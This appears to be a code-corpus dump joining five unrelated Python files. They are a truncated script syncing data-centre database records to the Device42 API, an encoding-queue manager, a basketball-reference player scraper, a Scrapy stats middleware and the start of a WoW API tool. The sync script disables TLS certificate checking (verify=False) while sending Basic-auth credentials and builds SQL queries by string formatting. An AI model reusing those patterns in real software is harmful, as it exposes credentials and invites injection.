(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
(?: \.
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
){3}
)
\s* # Trailing whitespace
$
""", re.VERBOSE | re.IGNORECASE | re.DOTALL)
return pattern.match(ip) is not None
class Logger():
def __init__(self, logfile):
self.logfile = LOGFILE
def writer(self, msg):
if LOGFILE and LOGFILE != '':
with codecs.open(self.logfile, 'a', encoding = 'utf-8') as f:
f.write(msg.strip()+'\r\n') # \r\n for notepad
try:
print msg
except:
print msg.encode('ascii', 'ignore') + ' # < non-ASCII chars detected! >'
class REST():
def __init__(self):
self.password = D42_PWD
self.username = D42_USER
self.base_url = D42_URL
self.racks = json.loads(self.get_racks())
def uploader(self, data, url):
payload = data
headers = {
'Authorization': 'Basic ' + base64.b64encode(self.username + ':' + self.password),
'Content-Type': 'application/x-www-form-urlencoded'
}
r = requests.post(url, data=payload, headers=headers, verify=False)
msg = 'Status code: %s' % str(r.status_code)
logger.writer(msg)
if DEBUG:
msg = unicode(payload)
logger.writer(msg)
msg = str(r.text)
logger.writer(msg)
def fetcher(self, url):
headers = {
'Authorization': 'Basic ' + base64.b64encode(self.username + ':' + self.password),
'Content-Type': 'application/x-www-form-urlencoded'
}
r = requests.get(url, headers=headers, verify=False)
msg = 'Status code: %s' % str(r.status_code)
logger.writer(msg)
if DEBUG:
msg = str(r.text)
logger.writer(msg)
return r.text
def post_ip(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/ip/'
msg = '\r\nPosting IP data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_device(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/device/'
msg = '\r\nPosting device data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_location(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/buildings/'
msg = '\r\nPosting location data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_room(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/rooms/'
msg = '\r\nPosting room data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_rack(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/racks/'
msg = '\r\nPosting rack data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_pdu(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdus/'
msg = '\r\nPosting PDU data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_pdu_update(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdus/rack/'
msg = '\r\nUpdating PDU data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_pdu_model(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdu_models/'
msg = '\r\nPosting PDU models from %s ' % url
logger.writer(msg)
self.uploader(data, url)
def get_pdu_models(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdu_models/'
msg = '\r\nFetching PDU models from %s ' % url
logger.writer(msg)
self.fetcher(url)
def get_racks(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/racks/'
msg = '\r\nFetching racks from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def get_rack_by_name(self, name):
for rack in self.racks['racks']:
if rack['name'] == name:
return rack
return None
def get_devices(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/devices/'
msg = '\r\nFetching devices from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def get_buildings(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/buildings/'
msg = '\r\nFetching buildings from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def get_rooms(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/rooms/'
msg = '\r\nFetching rooms from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def post_hardware(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/hardwares/'
msg = '\r\nAdding hardware data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_device2rack(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/device/rack/'
msg = '\r\nAdding device to rack at %s ' % url
logger.writer(msg)
self.uploader(data, url)
class DB():
def __init__(self):
self.con = None
self.tables = []
self.datacenters_dcim = {}
self.rooms_dcim = {}
self.racks_dcim = {}
self.manufacturers = {}
def connect(self):
self.con = sql.connect(host=DB_IP, port=int(DB_PORT), db=DB_NAME, user=DB_USER, passwd=DB_PWD)
def get_ips(self):
net = {}
adrese = []
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = "SELECT PrimaryIP FROM fac_Device"
cur.execute(q)
ips = cur.fetchall()
for line in ips:
if line[0] != '':
ip = line[0]
if is_valid_ip(ip):
net.update({'ipaddress':ip})
rest.post_ip(net)
with self.con:
cur = self.con.cursor()
q = "SELECT IPAddress FROM fac_PowerDistribution"
cur.execute(q)
ips = cur.fetchall()
for line in ips:
if line[0] != '':
ip = line[0]
if is_valid_ip(ip):
net.update({'ipaddress':ip})
rest.post_ip(net)
def get_locations(self):
building = {}
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT DatacenterID,Name,DeliveryAddress,Administrator FROM fac_DataCenter'
cur.execute(q)
data = cur.fetchall()
for row in data:
#building.clear()
id, name, address, contact = row
building.update({'name':name})
building.update({'address':address})
building.update({'contact_name':contact})
self.datacenters_dcim.update({id:name})
rest.post_location(building)
def get_rooms(self):
rooms = {}
# get building IDs from D42
building_map = {}
buildings = json.loads(rest.get_buildings())
for building in buildings['buildings']:
building_map.update({building['name']:building['building_id']})
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT ZoneID,DataCenterID,Description FROM fac_Zone'
cur.execute(q)
data = cur.fetchall()
for row in data:
room_id = row[0]
dc = row[1]
name = row[2]
dc = self.datacenters_dcim[dc]
dc_id = building_map[dc]
rooms.update({'name':name})
rooms.update({'building_id':dc_id})
self.rooms_dcim.update({room_id:name})
rest.post_room(rooms)
def get_racks(self):
# get room IDs from D42
room_map = {}
rooms = json.loads(rest.get_rooms())
for room in rooms['rooms']:
room_map.update({room['name']:room['room_id']})
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT CabinetID,DatacenterID,Location,CabinetHeight,ZoneID FROM fac_Cabinet'
cur.execute(q)
data = cur.fetchall()
for row in data:
rack = {}
cid, did, name, height, room = row
dc = self.datacenters_dcim[did]
if height != 0:
if name == '':
rnd = str(random.randrange(101,9999))
name = 'Unknown'+rnd
if room > 0:
room = self.rooms_dcim[room]
room_id = room_map[room]
rack.update({'room_id':room_id})
d42_rack = rest.get_rack_by_name(name)
if d42_rack:
rack.update({'rack_id':d42_rack['rack_id']})
rack.update({'name':name})
rack.update({'size':height})
rack.update({'building':dc})  # datacenter name, not the numeric DatacenterID
self.racks_dcim.update({cid:name})
rest.post_rack(rack)
def get_datacenter_from_id(self, id):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT Name FROM fac_DataCenter where DataCenterID = %d' % id
cur.execute(q)
data = cur.fetchone()
return data
def get_room_from_cabinet(self, cabinetID):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT DatacenterID,Location,Model FROM fac_Cabinet where CabinetID = %d' % cabinetID
cur.execute(q)
data = cur.fetchone()
id, room, model = data
datacenter = self.get_datacenter_from_id(id)[0]
return datacenter, room, model
def get_vendor_and_model(self, id):
self.get_manufacturers()
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT ManufacturerID, Model FROM fac_DeviceTemplate WHERE TemplateID=%d' % id
cur.execute(q)
data = cur.fetchone()
try:
id, model = data
except TypeError:
return None, None
vendor = self.manufacturers[id]
return vendor, model
def get_devices(self):
device = {}
device2rack = {}
hardware = {}
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT Label, SerialNo, AssetTag, PrimaryIP, Cabinet,Position,Height,DeviceType,HalfDepth,BackSide, TemplateID FROM fac_Device'
cur.execute(q)
data = cur.fetchall()
for row in data:
name, serial_no, comment, ip, rackid, position, size, devicetype, halfdepth, backside, tid = row
datacenter, room, rack_name = self.get_room_from_cabinet(rackid)
vendor, model = self.get_vendor_and_model(tid)
# post device
device.update({'name':name})
device.update({'manufacturer':vendor})
device.update({'hardware':model})
device.update({'notes':comment})
if devicetype.lower() == 'cdu':
device.update({'pdu_model':model})
rest.post_pdu(device)
else:
device.update({'serial_no':serial_no})
if devicetype.lower() == 'switch':
device.update({'is_it_switch':'yes'})
rest.post_device(device)
if rackid:
#post device 2 rack
device2rack.update({'device':name})
device2rack.update({'size':size})
#device2rack.update({'building':datacenter})
#device2rack.update({'room':room})
device2rack.update({'rack': self.racks_dcim[rackid]})
device2rack.update({'start_at':position-1})
if backside == '1':
device2rack.update({'orientation':'back'})
rest.post_device2rack(device2rack)
def get_manufacturers(self):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT ManufacturerID, Name from fac_Manufacturer'
cur.execute(q)
data = cur.fetchall()
for row in data:
id, vendor = row
self.manufacturers.update({id:vendor})
def get_depth(self, id):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT HalfDepth FROM fac_Device WHERE TemplateID=%d' % id
cur.execute(q)
data = cur.fetchone()
d = data[0]
if d == 0:
return 1
elif d == 1:
return 2
def get_hardware(self):
self.get_manufacturers()
hardware = {}
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT TemplateID, ManufacturerID, Model, Height, Wattage, DeviceType, FrontPictureFile, RearPictureFile FROM fac_DeviceTemplate'
cur.execute(q)
data = cur.fetchall()
for row in data:
TemplateID, ManufacturerID, Model, Height, Wattage, DeviceType, FrontPictureFile, RearPictureFile = row
try:
depth = self.get_depth(TemplateID)
except TypeError:
continue
vendor = self.manufacturers[ManufacturerID]
hardware.update({'name':Model})
hardware.update({'size':Height})
hardware.update({'depth':depth})
hardware.update({'manufacturer':vendor})
hardware.update({'watts':Wattage})
if DeviceType.lower() == 'cdu':
rest.post_pdu_model(hardware)
else:
hardware.update({'type':1})
'''
# to do
if FrontPictureFile:
hardware.update({'front_image':FrontPictureFile})
if RearPictureFile:
hardware.update({'back_image':RearPictureFile})
'''
rest.post_hardware(hardware)
def main():
db = DB()
db.get_ips()
db.get_locations()
db.get_rooms()
db.get_racks()
db.get_hardware()
db.get_devices()
if __name__ == '__main__':
logger = Logger(LOGFILE)
rest = REST()
main()
print '\n[!] Done!'
sys.exit()
| bsd-2-clause | 3,975,270,395,107,543,600 | 32.001698 | 146 | 0.485441 | false | 3.758314 | false | false | false |
dhardtke/pyEncode | app/modules/mod_process/process_repository.py | 1 | 7493 | import os
import re
from app import db, config, socketio, app
from app.library.formatters import formatted_file_data
from app.models.file import File
from app.models.package import Package
from app.modules.mod_process.file_repository import FileRepository
from app.modules.mod_process.status_map import StatusMap
class ProcessRepository:
# this dict holds all the currently active processes as id-instance pairs
# example: {1: <...>, 2: <...>, ...}
processes = {}
# this controls whether or not the encoding processing is active
# notice: do not modify this directly, but use set_encoding_active()
encoding_active = False
@staticmethod
def set_encoding_active(new_state):
"""
change the state of whether encoding should be active or not to a new state
:param new_state: should the encoding be active now
"""
ProcessRepository.encoding_active = new_state
# notify client
socketio.emit("active_changed", {"active": new_state})
# check if it's necessary to start new processes
ProcessRepository.check_and_start_processes()
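# e.g. (illustrative): ProcessRepository.set_encoding_active(True) flips
# the flag, emits an "active_changed" event to connected clients and
# immediately tries to fill the pool up to
# config["general"]["parallel_processes"] running encodes.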
@staticmethod
def cancel_all_processes():
"""
cancel all currently running Processes
"""
# iterate over a copy of processes because cancel_process modifies the dictionary
# while we are iterating over it
for file_id in ProcessRepository.processes.copy():
ProcessRepository.cancel_process(file_id)
@staticmethod
def is_running(file_id):
return file_id in ProcessRepository.processes
@staticmethod
def cancel_process(file_id):
"""
cancel a specific Process
:param file_id: the id of the file corresponding to the Process
"""
# stop thread
ProcessRepository.processes[file_id].stop()
# update status
file = File.query.filter_by(id=file_id).first()
file.status = StatusMap.failed.value
file.clear()
db.session.commit()
# emit file_done event
socketio.emit("file_done", {"data": formatted_file_data(file)})
# remove from processes dict
ProcessRepository.processes.pop(file_id)
@staticmethod
def check_and_start_processes():
"""
check if it's required to start new Processes and do so if needed
"""
while ProcessRepository.encoding_active:
# grab next potential file to process
file = FileRepository.get_queued_query().order_by(Package.position.asc(), File.position.asc()).first()
if file is None or ProcessRepository.count_processes_active() >= config["general"].getint(
"parallel_processes"):
break
# update file.status in DB
file.status = StatusMap.processing.value
db.session.commit()
# start the Process
from app.modules.mod_process.process import Process
process = Process(file)
process.daemon = True
# todo debug
# file.status = 0
# db.session.commit()
# ProcessRepository.encoding_active = False
# add to "processes" dict
ProcessRepository.processes[file.id] = process
process.start()
# emit file_started event
data = formatted_file_data(file)
data["count_active"] = ProcessRepository.count_processes_active()
data["count_queued"] = ProcessRepository.count_processes_queued()
socketio.emit("file_started", {"data": data})
@staticmethod
def count_processes_active():
"""
:return: the amount of processes currently active
"""
return len(ProcessRepository.processes)
@staticmethod
def count_processes_queued():
"""
:return: the amount of Files currently queued
"""
return FileRepository.get_queued_query().count()
@staticmethod
def count_processes_total():
"""
:return: count of all Files that are in packages that are queued
"""
# return ProcessRepository.count_processes_active() + ProcessRepository.count_processes_queued()
return Package.query.filter_by(queue=True).join(File).count()
# TODO
@staticmethod
def file_done(file):
"""
will be called whenever a Process is finished
:param file: the File object of the File that is done
"""
# delete from "processes"
ProcessRepository.processes.pop(file.id)
# remove original file from disk if desired
if config.getboolean("encoding", "delete_old_file"):
os.remove(file.filename)
# rename file if desired
if config.getboolean("encoding", "rename_enabled"):
rename_search = config.get("encoding", "rename_search")
rename_replace = config.get("encoding", "rename_replace")
# get pathinfo
pathinfo = os.path.split(file.filename)
path = pathinfo[0]
old_filename = pathinfo[1]
# only rename if match occurs
if re.match(rename_search, old_filename):
new_filename = re.sub(rename_search, rename_replace, old_filename)
# rename output_filename (created by ffmpeg, see process.py) to new_filename
os.rename(path + os.sep + file.output_filename, path + os.sep + new_filename)
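                # Worked example (illustrative config values):
                #   rename_search = r'(.*)\.avi', rename_replace = r'\1.mkv'
                #   renames "movie.avi" to "movie.mkv" once encoding has finished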
# update status to "finished"
db.session.query(File).filter_by(id=file.id).update(dict(status=StatusMap.finished.value))
db.session.commit()
# check if it's necessary to start new processes
ProcessRepository.check_and_start_processes()
# notify client
socketio.emit("file_done", {
"data": {
"id": file.id,
"count_active": ProcessRepository.count_processes_active(),
"count_queued": ProcessRepository.count_processes_queued(),
"count_total": ProcessRepository.count_processes_total(),
}
})
app.logger.debug("Done with encoding of %s" % file.filename)
@staticmethod
def file_failed(file):
"""
will be called whenever a File fails
:param file: the File object of the File that has failed
"""
# delete from "processes"
ProcessRepository.processes.pop(file.id)
# update status and set attributes to zero
file = db.session.query(File).filter_by(id=file.id).first()
file.status = StatusMap.failed.value
file.clear()
db.session.commit()
# check if it's necessary to start new processes
ProcessRepository.check_and_start_processes()
# notify client
socketio.emit("file_done", {
"data": {
"id": file.id,
"count_active": ProcessRepository.count_processes_active(),
"count_queued": ProcessRepository.count_processes_queued(),
"count_total": ProcessRepository.count_processes_total(),
}
})
@staticmethod
def file_progress(file):
"""
will be called whenever a file makes progress
:param file: the File object of the File that has made progress
"""
# format data
info = formatted_file_data(file)
socketio.emit("file_progress", {"data": info})
| mit | 5,981,169,389,569,720,000 | 32.302222 | 114 | 0.609369 | false | 4.5193 | true | false | false |
sansbacon/nba | bbref.py | 1 | 15408 | # bbref.py
import datetime
import logging
import re
from string import ascii_lowercase
from bs4 import BeautifulSoup
from dateutil.parser import *
from nba.scraper import BasketballScraper
from nba.dates import datetostr
from nba.names import fuzzy_match
from nba.pipelines.bbref import *
from nba.player.nbacom import *
class Scraper(BasketballScraper):
    '''Scrapes player-index and player pages from basketball-reference.com.'''
def __init__(self, headers=None, cookies=None, cache_name=None):
'''
Args:
headers:
cookies:
cache_name:
'''
logging.getLogger(__name__).addHandler(logging.NullHandler())
BasketballScraper.__init__(self, headers=headers, cookies=cookies, cache_name=cache_name)
def players(self, initial):
'''
Returns:
content: dict with keys of alphabet
'''
base_url = 'http://www.basketball-reference.com/players/{}/'
return self.get(base_url.format(initial.lower()))
def player_page(self, pid):
'''
Gets page for individual player
Args:
pid(str): 'smithje01'
Returns:
str: HTML of page
'''
base_url = 'http://www.basketball-reference.com/players/{}/{}.html'
return self.get(base_url.format(pid[0].lower(), pid))
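# Usage sketch (illustrative player id; performs a network request):
#
#   scraper = Scraper(cache_name='bbref')
#   html = scraper.player_page('jamesle01')
#   # -> HTML of http://www.basketball-reference.com/players/j/jamesle01.html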
class Parser(object):
    '''Parses basketball-reference.com HTML pages.'''
    def __init__(self, **kwargs):
logging.getLogger(__name__).addHandler(logging.NullHandler())
def players(self, content):
'''
Parses page of players with same last initial (A, B, C, etc.)
Args:
content: HTML string
Returns:
list of dict
'''
results = []
soup = BeautifulSoup(content, 'lxml')
for row in soup.find('table', {'id': 'players'}).find('tbody').find_all('tr'):
player = dict([(td['data-stat'], td.text) for td in row.find_all('td')])
player['source_player_id'] = row.find('th').get('data-append-csv')
player['source_player_name'] = row.find('th').find('a').text
th = row.find('th')
if th.find('strong'):
player['active'] = True
else:
player['active'] = False
if player.get('pos'):
player['source_player_position'] = player['pos']
player.pop('pos', None)
results.append(player)
return results
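    # Each returned dict looks roughly like (illustrative values):
    #   {'source_player_id': 'jamesle01', 'source_player_name': 'LeBron James',
    #    'active': True, 'source_player_position': 'F-G', ...}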
def player_page(self, content, pid):
'''
Parses player page
Args:
content: HTML string
Returns:
dict: source, source_player_id, source_player_name,
source_player_position, source_player_dob,
source_player_team_code, source_player_team_name
'''
player = {'source': 'bref', 'source_player_id': pid}
soup = BeautifulSoup(content, 'lxml')
#source_player_name
h1 = soup.find('h1', {'itemprop': 'name'})
if h1:
player['source_player_name'] = h1.text
#source_player_position
positions = ['Shooting Guard', 'Power Forward and Small Forward', 'Small Forward', 'Center', 'Point Guard',
'Center and Power Forward', 'Power Forward and Center', 'Shooting Guard and Small Forward',
'Power Forward', 'Small Forward and Shooting Guard', 'Point Guard and Shooting Guard',
'Guard', 'Forward']
div = soup.find('div', {'itemtype': 'https://schema.org/Person'})
for p in div.find_all('p'):
if 'Position:' in p.text:
for line in [l.strip() for l in p.text.split('\n')]:
if line in positions:
player['source_player_position'] = line
elif 'Team:' in p.text:
a = p.find('a')
if a:
player['source_player_team_code'] = a['href'].split('/')[2]
player['source_player_team_name'] = a.text
# source_player_dob
bd = soup.find('span', {'id': 'necro-birth'})
if bd:
player['source_player_dob'] = bd.attrs.get('data-birth')
return player
class Agent(object):
    '''
    Performs script-like tasks matching nba.com players with basketball-reference.com
    '''
def __init__(self, db=None, cache_name='bbref-agent', cookies=None, table_names=None):
'''
Args:
cache_name (str): for scraper cache_name
cookies: cookie jar
db (NBAPostgres): instance
table_names (dict): Database table names
'''
logging.getLogger(__name__).addHandler(logging.NullHandler())
        self.scraper = Scraper(cache_name=cache_name, cookies=cookies)
        self.parser = Parser()
self.db = db
self.bbref_players = {}
def match_gamelog_player(self, gamelog_player):
'''
Matches player from nbacom_gamelog with bbref player
Args:
gamelog_player (dict):
Returns:
dict
'''
# gamelog player
# {'PLAYER_ID': 2544, 'PLAYER_NAME': 'LeBron James',
# 'TEAM_ABBREVIATION': 'CLE', 'TEAM_NAME': 'Cleveland Cavaliers'}
#
# bbref player
# {'source': 'bref', source_player_dob': '1992-03-23', 'source_player_id': 'irvinky01',
# 'source_player_name': 'Kyrie Irving', 'source_player_position': 'Point Guard',
# 'source_player_team_code': 'BOS', 'source_player_team_name': 'Boston Celtics'}
# bbref_players caches pages for each letter
# helpful if doing more than a few players
fn, ln = gamelog_player['PLAYER_NAME'].split()
letter = ln[0].lower()
if not self.bbref_players.get(letter):
content = self.scraper.players(letter)
self.bbref_players[letter] = self.parser.players(content)
# step one: find all players with the same name
matches = [p for p in self.bbref_players.get(letter) if
p['source_player_name'] == gamelog_player['PLAYER_NAME']]
# if no matches, then look for individual player page on bbref
# newer players may not have been added to the letter index page ('a', 'b', 'c')
if not matches:
pid = bbref_player_id(fn, ln)
logging.info('trying player page for {}'.format(pid))
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if there is only 1 match, then assume it is the right player
# need to get the player page, which has the full position
elif matches and len(matches) == 1:
            logging.info('match_gamelog_player: found 1 match')
pid = matches[0].get('source_player_id')
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if more than 1 match, then try to match team as well
# very unlikely to have duplicate
elif matches and len(matches) > 1:
            logging.info('match_gamelog_player: found >1 match')
            pn = gamelog_player['PLAYER_NAME']
            pt = gamelog_player['TEAM_NAME']
            # a single pass is enough; the original code shadowed `match` with a
            # redundant inner loop over the same list
            for match in matches:
                bbrefn = match['source_player_name']
                bbreft = match['source_player_team_name']
                if pn == bbrefn and pt == bbreft:
                    pid = match.get('source_player_id')
                    content = self.scraper.player_page(pid)
                    bbref_player = self.parser.player_page(content, pid)
                    if bbref_player:
                        return bbref_player
else:
logging.info('no match for {}'.format(gamelog_player['PLAYER_NAME']))
return None
def match_nbacom_player(self, nbacom_player):
'''
Matches nbacom player (player v2015 resource) with bbref player
Args:
nbacom_player (dict):
Returns:
dict
'''
# nbacom player
# {'birthdate': datetime.datetime(1993, 8, 1, 0, 0), 'country': 'Spain',
# 'display_first_last': 'Alex Abrines', 'draft_number': 32, 'draft_round': 2, 'draft_year': 2013,
# 'first_name': 'Alex', 'from_year': 2016, 'height': 42, 'jersey': 8,
# 'last_affiliation': 'Spain/Spain', 'last_name': 'Abrines', 'nbacom_player_id': 203518,
# 'nbacom_position': 'G', 'school': '', 'weight': 190}
#
# bbref player
# {'source': 'bref', source_player_dob': '1992-03-23', 'source_player_id': 'irvinky01',
# 'source_player_name': 'Kyrie Irving', 'source_player_position': 'Point Guard',
# 'source_player_team_code': 'BOS', 'source_player_team_name': 'Boston Celtics'}
# bbref_players caches pages for each letter
# helpful if doing more than a few players
letter = nbacom_player['last_name'][0].lower()
if not self.bbref_players.get(letter):
content = self.scraper.players(letter)
self.bbref_players[letter] = self.parser.players(content)
# step one: find all players with the same name
matches = [p for p in self.bbref_players.get(letter) if
p['source_player_name'] == nbacom_player.get('display_first_last')]
# if no matches, then look for individual player page on bbref
# newer players may not have been added to the letter index page ('a', 'b', 'c')
if not matches:
pid = bbref_player_id(nbacom_player['first_name'], nbacom_player['last_name'])
logging.info('trying player page for {}'.format(pid))
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if there is only 1 match, then assume it is the right player
# need to get the player page, which has the full position
elif matches and len(matches) == 1:
            logging.info('match_nbacom_player: found 1 match')
pid = matches[0].get('source_player_id')
content = self.scraper.player_page(pid)
bbref_player = self.parser.player_page(content, pid)
if bbref_player:
return bbref_player
# if more than 1 match, then try to match team as well
# very unlikely to have duplicate
elif matches and len(matches) > 1:
            logging.info('match_nbacom_player: found >1 match')
for match in matches:
dob = match['source_player_dob']
if dob == datetostr(nbacom_player.get('birthdate'), fmt='nba'):
return match
else:
logging.info('no match for {}'.format(nbacom_player['display_first_last']))
return None
def update_player_xref(self):
'''
Updates player_xref table with bbref players
Args:
None
Returns:
None
'''
nbacom_players_d = nbacom_xref(self.db)
nbacom_players_d2 = nbacom_xref(self.db, with_pos=True)
wanted = ['source', 'source_player_id', 'source_player_name', 'source_player_position']
# loop through each 'letter' page of players
for letter in ascii_lowercase:
            if letter == 'x':
                # basketball-reference has no index page for surnames starting with 'x'
                continue
logging.info('starting {}'.format(letter))
content = self.scraper.players(letter)
for p in self.parser.players(content):
# try direct name match first
# if no match, then use fuzzy matching
# if 1 match, then add to database
# if more then 1 result, then consider positions as well
match = nbacom_players_d.get(p['source_player_name'].lower())
if not match:
# try fuzzy matching
# TODO: implement fuzzy match
if p.get('active'):
logging.error('could not match {}'.format(p))
elif len(match) == 1:
toins = {k: v for k, v in p.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = match[0]['nbacom_player_id']
toins['source_player_dob'] = datetime.datetime.strftime(parse(p['birth_date']),
'%Y-%m-%d')
self.db.insert_dict(toins, 'extra_misc.player_xref')
else:
key = '{}_{}'.format(p['source_player_name'], p['source_player_position']).lower()
match2 = nbacom_players_d2.get(key)
if not match2:
if p.get('active'):
match3 = fuzzy_match(key, list(nbacom_players_d2.keys()))
if match3:
try:
toins = {k: v for k, v in p.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = nbacom_players_d2.get(match3).get('nbacom_player_id')
toins['source_player_dob'] = datetime.datetime.strftime(parse(p['birth_date']),
'%Y-%m-%d')
self.db.insert_dict(toins, 'extra_misc.player_xref')
except:
logging.error('could not match {}'.format(p))
else:
logging.error('could not match {}'.format(p))
elif match2 and len(match2) == 1:
toins = {k: v for k, v in p.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = match2[0]['nbacom_player_id']
toins['source_player_dob'] = datetime.datetime.strftime(parse(p['birth_date']),
'%Y-%m-%d')
self.db.insert_dict(toins, 'extra_misc.player_xref')
else:
if p.get('active'):
logging.error('could not match {}'.format(p))
'''
TODO: can match DOB for multiple players
more accurate than fuzzy match
wanted = ['source_player_id', 'source_player_position', 'source_player_name']
for m in tomatch:
dob = parse(m.get('birth_date')).date()
nbap = nbadb2.select_scalar(q.format(m['source_player_name'].split()[-1] , dob))
if nbap:
toins = {k:v for k,v in m.items() if k in wanted}
toins['source'] = 'bbref'
toins['nbacom_player_id'] = nbap
toins['source_player_dob'] = m['birth_date']
nbadb2._insert_dict(toins, 'extra_misc.player_xref')
'''
if __name__ == '__main__':
pass
| mit | -6,796,014,073,940,704,000 | 38.917098 | 117 | 0.524208 | false | 4.002078 | false | false | false |
moijes12/oh-mainline | vendor/packages/scrapy/scrapy/contrib/downloadermiddleware/stats.py | 19 | 1370 | from scrapy.exceptions import NotConfigured
from scrapy.utils.request import request_httprepr
from scrapy.utils.response import response_httprepr
from scrapy.stats import stats
from scrapy.conf import settings
class DownloaderStats(object):
def __init__(self):
if not settings.getbool('DOWNLOADER_STATS'):
raise NotConfigured
def process_request(self, request, spider):
stats.inc_value('downloader/request_count', spider=spider)
stats.inc_value('downloader/request_method_count/%s' % request.method, spider=spider)
reqlen = len(request_httprepr(request))
stats.inc_value('downloader/request_bytes', reqlen, spider=spider)
def process_response(self, request, response, spider):
stats.inc_value('downloader/response_count', spider=spider)
stats.inc_value('downloader/response_status_count/%s' % response.status, spider=spider)
reslen = len(response_httprepr(response))
stats.inc_value('downloader/response_bytes', reslen, spider=spider)
return response
def process_exception(self, request, exception, spider):
ex_class = "%s.%s" % (exception.__class__.__module__, exception.__class__.__name__)
stats.inc_value('downloader/exception_count', spider=spider)
stats.inc_value('downloader/exception_type_count/%s' % ex_class, spider=spider)
| agpl-3.0 | 1,570,326,803,235,319,800 | 46.241379 | 95 | 0.705109 | false | 3.971014 | false | false | false |
codex-bot/github | github/events/repository.py | 1 | 1573 | from data_types.organization import Organization
from data_types.repository import Repository
from data_types.user import User
from .base import EventBase
class EventRepository(EventBase):
def __init__(self, sdk):
super(EventRepository, self).__init__(sdk)
        self.hook = None
        self.repository = None
        self.organization = None
        self.sender = None
"""
RepositoryEvent
Triggered when someone creates a new repository in your organization.
https://docs.github.com/en/developers/webhooks-and-events/webhook-events-and-payloads#repository
"""
async def process(self, payload, chat):
"""
Processes Repository event
:param payload: JSON object with payload
:param chat: current chat object
:return:
"""
self.sdk.log("Repository event payload taken {}".format(payload))
try:
self.repository = Repository(payload['repository'])
self.organization = Organization(payload['organization'])
self.sender = User(payload['sender'])
except Exception as e:
            self.sdk.log('Cannot process RepositoryEvent payload because of {}'.format(e))
            return
await self.send(
chat['chat'],
'🦍 <a href=\"{}\">{}</a> created a repository <a href=\"{}\">{}</a> in the {} organization'.format(
self.sender.html_url,
self.sender.login,
self.repository.html_url,
self.repository.full_name,
self.organization.login),
'HTML'
)
| mit | 820,249,232,561,150,100 | 29.784314 | 111 | 0.601911 | false | 4.563953 | false | false | false |
ivanvza/api-wow-python | wow_api.py | 1 | 17489 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import sys
import datetime
import optparse
import urllib2
from BeautifulSoup import BeautifulSoup
import textwrap
options = optparse.OptionParser(usage='%prog -r <Realm> -c <Character Name> --cs <options>', description='WoW API functions (https://github.com/blizzard/api-wow-docs) - OneSockThief')
#Functions
options_functions = optparse.OptionGroup(options, 'Supported functions')
options_functions.add_option('--cs', '--charactersearch', action="store_true", dest='charactersearch', help='Character search / Information')
options_functions.add_option('--ah', '--auctionsearch', action="store_true", dest='auctionsearch', help='Auction house search')
options.add_option_group(options_functions)
#Required parameters for other functions
options.add_option('-r', '--realm', type='string', dest='realm', help='Realm to search/filter by')
options.add_option("-c", "--character", type='string', dest="character", help="Search for a character by name")
#Smaller functions, for character details
character_group = optparse.OptionGroup(options, 'Detailed character information to use with Character Search (--cs)')
character_group.add_option("--guild", action="store_true", dest="guild", help="Guild information")
character_group.add_option("--items", action="store_true", dest="items", help="Current equipped items")
character_group.add_option("--mounts", action="store_true", dest="mounts", help="Current mounts collected")
character_group.add_option("--pvp", action="store_true", help="PvP stats")
character_group.add_option("--quests", action="store_true", dest="quests", help="Current active quests")
character_group.add_option("--reputation", action="store_true", dest="reputation", help="Current reputation level of appropriate factions")
character_group.add_option("--stats", action="store_true", dest="stats", help="Currect character stats #pewpew")
character_group.add_option("--talents", action="store_true", dest="talents", help="Current talent progres")
